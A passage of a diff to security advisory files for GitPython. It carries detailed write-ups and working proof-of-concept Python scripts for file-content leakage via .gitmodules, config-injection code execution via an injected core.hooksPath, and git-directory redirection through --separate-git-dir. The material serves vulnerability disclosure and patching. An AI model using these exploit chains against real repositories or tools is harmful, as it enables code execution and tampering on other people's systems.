\"-C\", attacker_repo, \"config\", \"user.name\", \"Attacker\"], check=True)\n\n with open(os.path.join(attacker_repo, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n\n with open(os.path.join(attacker_repo, \".gitmodules\"), \"w\") as f:\n f.write(\n '[submodule \"totally-normal-dep\"]\\n'\n \"\\tpath = vendor/dep\\n\"\n \"\\turl = https://example.com/dep.git\\n\"\n \"[include]\\n\"\n \"\\tpath = %s\\n\" % target_file\n )\n\n subprocess.run([\"git\", \"-C\", attacker_repo, \"add\", \"file.txt\", \".gitmodules\"], check=True)\n subprocess.run([\"git\", \"-C\", attacker_repo, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n import configparser\n\n repo = git.Repo.clone_from(attacker_repo, dest)\n\n try:\n subs = list(repo.submodules)\n print(\"NOT VULNERABLE: no exception raised, submodules =\", subs)\n sys.exit(1)\n except configparser.MissingSectionHeaderError as e:\n msg = str(e)\n print(\"VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:\")\n print(msg)\n with open(target_file) as f:\n first_line = f.readline().rstrip(\"\\n\")\n if first_line in msg:\n print(\"Confirmed: target file's first line is present verbatim in the exception message.\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: exception message did not contain the expected content\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78675" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7833-fr7j-v32q" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2211" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/ef7568e3b317ce617eacda39b8b54dcdff8c3b5c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3785.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-local-file-content-disclosure-via-gitmodules" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78676.json b/advisories/BREW-fdroidserver-CVE-2026-78676.json index 2f8a61c85a3..76b595695fa 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78676.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78676.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78676", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "PYSEC-2026-3786", "CVE-2026-78676", @@ -52,21 +52,38 @@ } ] }, - "details": "GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.", + "summary": "GitPython: Dormant multi-line git-config values are corrupted into live injected directives (e.g. core.hooksPath) on any unrelated GitConfigParser write, enabling RCE", + "details": "- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument\n- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\nGitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\\r`/`\\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.\n\nThat guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.\n\nThe bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and \"handles\" any embedded newline in the value with `.replace(\"\\n\", \"\\n\\t\")` (line 708), emitting a bare, unquoted `` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `\\nhooksPath = `, that second line is parsed as a brand-new `core.hooksPath = ` directive — live, real Git configuration, not a value.\n\n`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.\n\n## Root cause\n`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *\"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values\"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.\n\n## Exploit path\n1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:\n ```\n [core]\n \tzzz = \"A\\nhooksPath = ../evil-hooks\\\n \"\n ```\n No raw `\\r`, `\\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.\n2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value(\"user\", \"name\", \"Test User\")`. This is one of the most ordinary operations a GitPython-based tool performs.\n3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:\n ```\n [core]\n \t...\n \tzzz = A\n \thooksPath = ../evil-hooks\n ```\n4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.\n5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.\n\n## Impact\nArbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` \"Newline injection... enables RCE via core.hooksPath\" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.\n\n## Preconditions\n- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `\\n = `. Realistic delivery:\n 1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, \"repo\" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.\n 2. **The documented shared-config `[include]` pattern** (`[include] path = ../`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).\n 3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).\n- No authentication/role requirement inside GitPython itself.\n\n## Evidence\n- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\\n` escape into a real embedded LF.\n- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace(\"\\n\", \"\\n\\t\")` with no re-quoting.\n- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.\n- `git log -S\"string_decode\"`, `-S\"write_section\"`, `-S'replace(\"\\n\", \"\\n\\t\")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.\n- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.\n\n## False-positive check (adversarial re-read)\n- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.\n- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a \"normal\" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.\n- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.\n- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.\n- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).\n\n## Remediation\nEither (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.\n\n## Confidence\nHigh. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.\n\n\n## Proof-of-Concept source (`gitpython-002-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value\n(standard quoted + backslash-continuation syntax, containing an escaped \"\\\\n\"\nthat decodes to a real embedded newline in memory) is corrupted into a NEW,\nlive config key the moment GitConfigParser re-serializes it during any\nunrelated write. If the smuggled second \"line\" looks like\n\"hooksPath = \", it becomes a real, active core.hooksPath after\none unrelated GitPython config write, and fires attacker code on the next\nhook-triggering git operation (e.g. `git commit`).\n\nThis is CWE-88/CWE-94 style argument/config injection, but via the READ path\n(a config file GitPython parses and later rewrites), not via a Python kwarg\nargument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /\nGHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all\nguard the setter-argument surface only.\n\nRun:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-002-poc.py \n\nBenign: only writes/reads inside . The \"malicious\" hook just writes a\nmarker file; no destructive/exfiltrating payload. Exits non-zero and prints\n\"NOT VULNERABLE\" if the corruption / hook does not fire.\n\"\"\"\nimport os\nimport subprocess\nimport sys\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-002-poc\"\n repo_dir = os.path.join(workdir, \"repo\")\n hooks_dir = os.path.join(workdir, \"evil-hooks\")\n marker = os.path.join(workdir, \"PWNED_MARKER.txt\")\n\n for p in (repo_dir, hooks_dir):\n os.makedirs(p, exist_ok=True)\n if os.path.exists(marker):\n os.remove(marker)\n\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", repo_dir], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", repo_dir, \"config\", \"user.name\", \"Test\"], check=True)\n\n # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value\n # inside [core] (before any other section). No raw CR/LF/NUL byte is\n # written to disk here -- this is standard git config quoting +\n # backslash-line-continuation, decoded by both real git and GitConfigParser\n # into the Python string 'A\\nhooksPath = ../evil-hooks'.\n cfg_path = os.path.join(repo_dir, \".git\", \"config\")\n with open(cfg_path) as f:\n original = f.read()\n poisoned_entry = '\\tzzz = \"A\\\\nhooksPath = ../evil-hooks\\\\\\n\"\\n'\n # Insert right after the [core] header line so it lives in the same section.\n new_config = original.replace(\"[core]\\n\", \"[core]\\n\" + poisoned_entry, 1)\n with open(cfg_path, \"w\") as f:\n f.write(new_config)\n\n # Confirm it's inert per real git before touching GitPython.\n pre = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if pre.returncode == 0:\n print(\"SETUP ERROR: core.hookspath already set before GitPython touched anything\")\n sys.exit(2)\n\n # Malicious hook: benign marker only.\n hook_path = os.path.join(hooks_dir, \"pre-commit\")\n with open(hook_path, \"w\") as f:\n f.write('#!/bin/sh\\necho \"PWNED-VIA-GITPYTHON-CONFIG-INJECTION\" > \"%s\"\\nexit 0\\n' % marker)\n os.chmod(hook_path, 0o755)\n\n import git # gitpython under test\n\n repo = git.Repo(repo_dir)\n before = repo.config_reader().get_value(\"core\", \"zzz\")\n print(\"core.zzz before any GitPython write =\", repr(before))\n\n # ONE totally unrelated, benign write -- this is the only \"attacker-adjacent\"\n # action required, and it is something virtually every GitPython consumer\n # does routinely (setting an option, adding a remote, updating a branch's\n # tracking config, ...).\n with repo.config_writer() as cw:\n cw.set_value(\"user\", \"name\", \"Test User\")\n\n post = subprocess.run(\n [\"git\", \"-C\", repo_dir, \"config\", \"--get\", \"core.hookspath\"],\n capture_output=True, text=True,\n )\n if post.returncode != 0:\n print(\"NOT VULNERABLE: core.hookspath still absent after the unrelated write\")\n sys.exit(1)\n\n injected_path = post.stdout.strip()\n print(\"core.hookspath is now LIVE after one unrelated write:\", injected_path)\n\n # Trigger the hook with a normal commit to prove it fires.\n with open(os.path.join(repo_dir, \"file2.txt\"), \"w\") as f:\n f.write(\"change\\n\")\n subprocess.run([\"git\", \"-C\", repo_dir, \"add\", \"file2.txt\"], check=True)\n subprocess.run(\n [\"git\", \"-C\", repo_dir, \"-c\", \"user.email=t@example.com\", \"-c\", \"user.name=T\",\n \"commit\", \"-q\", \"-m\", \"trigger hook\"],\n check=True,\n )\n\n if os.path.isfile(marker):\n with open(marker) as f:\n content = f.read().strip()\n print(\"VULNERABLE: hook fired, marker content =\", content)\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: hook did not fire\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78676" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-284h-m62q-gf8w" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3786.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-config-injection" } ] } diff --git a/advisories/BREW-fdroidserver-CVE-2026-78677.json b/advisories/BREW-fdroidserver-CVE-2026-78677.json index 17fe7005f56..154bef29633 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-78677.json +++ b/advisories/BREW-fdroidserver-CVE-2026-78677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-78677", "published": "2026-09-04T08:59:24Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "PYSEC-2026-3787", "CVE-2026-78677", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 omits --separate-git-dir from unsafe_git_clone_options, allowing attackers to create arbitrary git directories outside the intended clone destination. Attackers can pass a separate_git_dir parameter to Repo.clone_from() or Repo.clone() to redirect repository metadata to an attacker-controlled filesystem path, enabling arbitrary directory creation and potential hook execution.", + "summary": "GitPython: clone_from()/clone() omit --separate-git-dir from unsafe_git_clone_options, enabling arbitrary git-directory creation outside the destination", + "details": "- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the \"escapes intended base directory\" sense)\n- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).\n\n`git clone` also accepts `--separate-git-dir=`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: `) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *\"Redirects the repository metadata to a caller-controlled path\"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:\n\n```\n:param allow_unsafe_options:\n Allow unsafe options to be used, such as ``--template`` and\n ``--separate-git-dir``.\n```\n\ni.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:\n\n```python\nunsafe_git_clone_options = [\n \"--upload-pack\",\n \"-u\",\n \"--config\",\n \"-c\",\n \"--template\",\n \"--bundle-uri\",\n]\n```\n\nSo any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.\n\n## Root cause\nParity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same \"denylist omits an equally-dangerous sibling option\" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).\n\n## Exploit path\n1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `\"separate-git-dir\"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.\n2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.\n3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=` and GitPython executes `git clone -v --separate-git-dir= -- ` via `subprocess` (no shell).\n4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.\n\n## Impact\nArbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` (\"Arbitrary Git Repository Creation Outside the Working Tree\", CVSS 8.2). Concretely:\n- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.\n- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.\n- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.\n\n## Preconditions\n- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n 